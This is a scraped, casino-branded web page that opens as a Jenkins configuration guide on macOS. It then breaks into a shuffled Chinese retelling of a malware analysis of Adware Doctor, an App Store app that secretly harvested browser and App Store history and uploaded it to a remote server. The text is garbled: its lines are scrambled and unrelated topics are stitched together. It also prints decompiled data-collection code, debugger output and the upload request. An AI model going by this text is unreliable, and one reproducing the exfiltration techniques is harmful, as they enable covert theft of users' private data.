Jenkins系列:环境配置介绍【蒲京娱乐场】
在Adware Doctor的宣传中,它是Mac用户抵御各种常见广告软件威胁的“最佳应用”:
Jenkins环境深入理解
- Jenkins相关配置文件路径
Jenkins工作目录:/Users/Shared/Jenkins/Home
项目目录:/jobs
单个项目目录:/jobs/项目名称
项目配置文件:/jobs/项目名称/config.xml
项目编译目录:/jobs/项目名称/builds
项目空间目录:/jobs/项目名称/workspace
插件目录:/plugins
Jenkins环境配置文件:/Library/LaunchDaemons/org.jenkins-ci.plist
配置 日志文件路径
配置 Jenkins工作目录
配置 Jenkins启动脚本
配置 Jenkins的用户归属
Jenkins参数配置文件:/Library/Preferences/org.jenkins-ci.plist
配置 http 端口号
配置 https 端口号
配置 https 证书信息
等等。。。。。。
日志:/private/var/log/jenkins/jenkins.log
启动目录:/Library/Application Support/Jenkins
启动脚本:jenkins-runner.sh
卸载脚本:Uninstall.command
重新启动Jenkins
网页重启方式:http://*****/restart
重启电脑方式
手动重启方式:
sudo launchctl load /Library/LaunchDaemons/org.jenkins-ci.plist
sudo launchctl unload /Library/LaunchDaemons/org.jenkins-ci.plist
[ ] 2. Jenkins 配置 https 地址
生成 https 证书
1
2
3
配置 https 证书位置
将证书key保存到 /Users/Shared/Jenkins/zhengshu/server-key.pem
将证书cert保存到 /Users/Shared/Jenkins/zhengshu/server-cert.pem
配置 /Library/Preferences/org.jenkins-ci.plist 文件
添加 httpsPort : 8443
添加 httpsPrivateKey : /Users/Shared/Jenkins/zhengshu/server-key.pem
添加 httpsCertificate : /Users/Shared/Jenkins/zhengshu/server-cert.pem
配置 /Library/Application Support/Jenkins/jenkins-runner.sh 文件
添加代码 add_to_args httpsPrivateKey
添加代码 add_to_args httpsCertificate
重启启动Jenkins
重启电脑方式
手动重启方式:
sudo launchctl unload /Library/LaunchDaemons/org.jenkins-ci.plist
sudo launchctl load /Library/LaunchDaemons/org.jenkins-ci.plist
[r14 appendString:@“ n === process === n”];
[
--Boundary-D779386A-2A17-4264-955A-94C5FC6F5AFA
rax = sysctl(0x10007df90, 0x3, 0x0, r13, 0x0, 0x0);
{
/Users/user
r15 = [[ACECommon realHomeDirectory] retain];
Content-Type: application/zip
proc_pidpath(*(int32_t *)(r14 - 0xcb), &var_1030, 0x1000);
1759 bash 501 user /bin/bash
首先,在运行文件监视器(例如MacOS内置的fs_usage)和对包含历史记录的文件进行过滤(不区分大小写)后,一些异常的文件访问历史显现出来:
var_1070 = var_1068;
1hour, 10minute, 31second
[r14 appendString:rbx];
"-c",
深入分析
rbx = [[FMDatabaseQueue databaseQueueWithPath:var_170] retain];
rbx = [[ACECommon collectProcessList2] retain];
[rbx release];
(lldb) po [$rdi launchPath]
rbx = [[r15 stringByAppendingPathComponent:@"Library/Safari/History.db"] retain];
运行进程监视器(例如开源的ProcInfo实用程序),可以观察到Adware Doctor使用内建zip实用程序创建受密码保护的history.zip存档:
通过编辑系统的/etc/hosts文件,将此请求重定向到研究人员控制的服务器,捕获到Adware Doctor尝试上传history.zip文件:
"/Library/LaunchDaemons/com.mixlr.MixlrAudioLink.plist",
"/Library/LaunchDaemons/com.mcafee.ssm.ScanManager.plist",
r15 = [[rbx stringByAppendingPathComponent:r12] retain];
===System===
[r13 release];
Adware Doctor的行为违反了苹果 Mac App Store严格的规则和政策。例如,在“App Store规则和指南” 的“数据收集和存储”部分指出:
待上传的“history.zip”文件受密码保护:
r15 = [[ACECommon realHomeDirectory] retain];
...
被macOS应用程序沙箱阻止(拒绝),因为枚举正在运行的进程(来自沙箱)是“禁忌”:
}
]
Accept-Language: en-us
rax = sub_1000519ad(&var_1068, &var_10A0,
)
Adware Doctor.44148 open ~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history.zip
r13 = [[NSString stringWithFormat:@"Library/Application Support/Google/Chrome/%@/History"] retain];
{
如图所示,下载的master.1.5.5.js文件包含基本JSON配置数据:
[var_1F0 sendPostRequestWithSuffix:@"checkadware" params:r12 file:rbx];
....
f1a19b8929ec88a81a6bdce6d5ee66e6,
rbx = [[self readLaunchFolder:r13] retain];
Connection: keep-alive
filePathPatten = (
path: /bin/bash
User-Agent: Adware%20Doctor/1026 CFNetwork/902.1 Darwin/17.7.0 (x86_64)
回到Adware Doctor应用界面,它已准备好清理用户的系统:
例如Adware.MAC.Pirrit:
/Applications/DVD Player.app(1396-07-20 02:11:55 +0000)
Host: adscan.yelabapp.com
Adware Doctor.44148 WrData[A] ~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history/safariHistory
该应用程序还有一个名为collectAppStoreHistoryToFile的方法,它将尝试在App Store App中获取用户最近的所有搜索记录:
pid: 2634
rbx = [[rbx stringByAppendingPathComponent:r13] retain];
[var_38 release];
[r14 appendString:@"===OS UpTime===n"];
"/Applications/SoftwareUpdater",
"/Library/LaunchDaemons/com.microsoft.autoupdate.helper.plist",
}
https://www.google.com/search?q=if+i+punch+myself+in+the+face+and+it+hurts+does+that+make+me+weak+or+strong 2018-08-20 21:19:57
输入webtool作为密码解压文件:
在调试器(lldb)中,观察用户主目录的访问尝试:
}
"com.webshoppers.agent.plist",
Attachment: 'history.zip' (length: 15810)
/Applications/Photo Booth.app(1396-04-25 01:50:31 +0000)
程序经过苹果官方审查和签发;
程序在沙盒中运行。
(lldb)po $ rdx
这项权限意味着应用程序可以请求某些文件的权限,并且得到明确的用户批准后,对文件进行读/写操作。Adware Doctor在第一次运行时,会请求访问用户的主目录以及下面的所有文件和目录:
看到这里,有三个问题需要解答:
Path: /1/checkadware
},
Adware Doctor.44148 open ~/Library/Application Support/CallHistoryTransactions
)
...
r14 = [r13 hasAccessPremisionPath:rbx];
研究人员使用静态分析(反编译)和动态分析(网络监控、文件监控和调试)的方法对这款应用程序进行了研究,以下是过程和结果。
"/Library/LaunchAgents/com.microsoft.update.agent.plist",
...
这些方法中的每一个都包含用于提取浏览器历史记录的代码。
}
(lldb)“/ Application / Adware Doctor.app”
0x10000cec5 <+6>: pushq %r14
这是通过[MainWindowController showFileAccess]方法实现的:
rbx = [[ACECommon fileStringWithPath:@"/Applications"] retain];
“faq_link”:“http://www.adwaredoctor.com/adware-doctor-faq/”
[r14 appendString:@"n===process2===n"];
},
在收集完用户数据后将所有内容都压缩到history.zip文件发送:
},{
1709 mdwrite 501 user /System/Library/Frame
从安全和隐私的角度来看,从官方Mac App Store安装应用程序的主要优势有两点:
[rbx release];
===OS UpTime===
[rbx release];
"/Library/LaunchDaemons/com.intel.haxm.plist",
},
}
Content-Type: multipart/form-data; boundary=Boundary-E2AE6908-4FC6-4C1D-911A-0B34F844C510
(lldb) po $rdi
-c,
“disable_prescan”:false,
r12 = [r14 initWithFormat:@"%@/Library/Application Support/%@/appStoreData", r15, rbx]
当应用程序在沙箱中运行时,可以访问的文件或用户信息非常有限,应该不能访问用户的浏览器历史记录,但这里Adware Doctor做到了。
var_30 = [[AppSandboxFileAccess fileAccess] retain];
在Mac App Store中,这款应用程序非常受欢迎,在最畅销的应用程序中排名第四,因此连苹果Mac App Store网站都列出了它的信息:
}
"/Applications/WebShoppy",
"content": "/Users/user/Downloads/charles-proxy-4.2.6.dmgn1397-06-02 20:48:18 +0000n(n "https://www.charlesproxy.com/assets/release/4.2.6/charles-proxy-4.2.6.dmg",n "https://www.charlesproxy.com/latest-release/download.do"n)nde043b43c49077bbdce75de22e2f2d54n"
Adware Doctor.44148 WrData[A] ~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history/chromeHistory
patten = "Chrome.*feed\.snowbitt\.com.*publisher=tingnew";
sysctl函数的调用加上字符串GetBSDProcessList给出了进程列表。它是苹果的GetBSDProcessList代码,可从应用程序沙箱中获取进程列表,也就是说 Adware Doctor用来绕沙箱的代码直接来自苹果。
po $ rax
rbx = malloc(0x0);
Adware Doctor.44148 WrData[A] ~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history/firefoxHistory
===Applications===
"/Library/LaunchDaemons/com.crashplan.engine.plist"
"com.WebShoppers.agent.plist",
/Applications/Chess.app(1396-06-15 01:20:21 +0000)
rbx = [r15 pattenDic];
(lldb) x/s $rsi
(lldb) po [$rdi launchPath]
{
000000010007df90 dd 0x00000001 ;CTL_KERN
/Library/LaunchAgents/com.vmware.launchd.vmware-tools-userd.plist
调用sub_1000519ad然后迭代该函数返回的一些列表,调用proc_pidpath。sub_1000519ad返回一个进程ID列表:
444 root wheel
Adware Doctor.44148 open ~/Library/Application Support/CallHistoryDB
[r14 appendFormat:@"%@n"];
rbx = [[ACECommon collectProcessList] retain];
/ * @class MainWindowController * /
1758 login 0 root /usr/bin/login
这些特征看起来是一款反广告软件,并且哈希值确实与已知的广告软件匹配:
"content": "/Users/user/Downloads/googlechrome.dmgn1397-06-02 21:15:46 +0000n(n "https://dl.google.com/chrome/mac/stable/GGRO/googlechrome.dmg",n "https://www.google.com/chrome/"n)n5533641bc4cc7af7784565ac2386a807n"
(lldb) po $rdx
研究人员查看了数据库的内容,是加密的(符合反广告软件/反恶意软件的做法):
[r14 appendFormat:@"%@n"];
}
在AppSandboxFileAccess类的帮助下:
{
rbx = [[BSUtil realHomeDirectory] retain];
md5 = (
[r14 release];
},{
(lldb) po [$rdi arguments]
r14 = [[FMDatabaseQueue databaseQueueWithPath:rbx] retain];
*参考来源:theregister,Freddy编译整理,转载请注明来自 FreeBuf.COM。返回搜狐,查看更多
(lldb)
+(void *)collectProcessList2
{
[r14 appendFormat:@"%@n"];
0x10006a147: "hasAccessPremisionPath:"
+(void)collectSafariHistoryToFile:(void *)arg2 {
...
}
"~/Library/LaunchAgents/com.spotify.webhelper.plist",
前言
请注意这个psCommonInfo也被exfilt到adscan.yelabapp.com(在history.zip文档中):
r13 = [[AppSandboxFileAccess fileAccess] retain];
Accept: */*
Adware Doctor
...
直到上面一步并没有出现异常,但后面对不对了。
(lldb) po $rdi
# ./procInfo
rbx = [[self readLaunchFolder:@"/Library/LaunchDaemons"] retain];
},
[rbx release];
"/Applications/WebTools",
)
[r14 appendString:@"n===Applications===n"];
15 = [[rbx stringByAppendingPathComponent:@"Library/Containers/com.apple.appstore/Data/Library/Caches/com.apple.appstore/WebKitCache/Version 11/Blobs", 0x0, 0x0] retain];
"~/Library/WebTools",
"/Library/LaunchDaemons/net.privatetunnel.ovpnagent.plist",
0x10000cec0 <+1>: movq %rsp, %rbp
$ cat com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history/safariHistory
192.168.86.76 - - [20/Aug/2018 10:53:24] "POST /1/checkadware HTTP/1.1" 200 -
...
(lldb) po $rdi
在“付费实用工具”分类中,Adware Doctor排名第一:
...
Headers:
近日有外媒报道,Mac App Store中付费安全软件中排名第一的Adware Doctor被研究人员发现在未经用户同意的情况下收集浏览历史,并将数据发送至位于中国的服务器,之后被Mac App Store下架。
使用网络代理监视器(Charles Proxy)捕获Adware Doctor到adscan.yelabapp.com的连接尝试:
rbx = [[ACECommon getSystemUpTime] retain];
Person 1:
===Launch===
本文由蒲京娱乐场发布于常见问答,转载请注明出处:Jenkins系列:环境配置介绍【蒲京娱乐场】
关键词: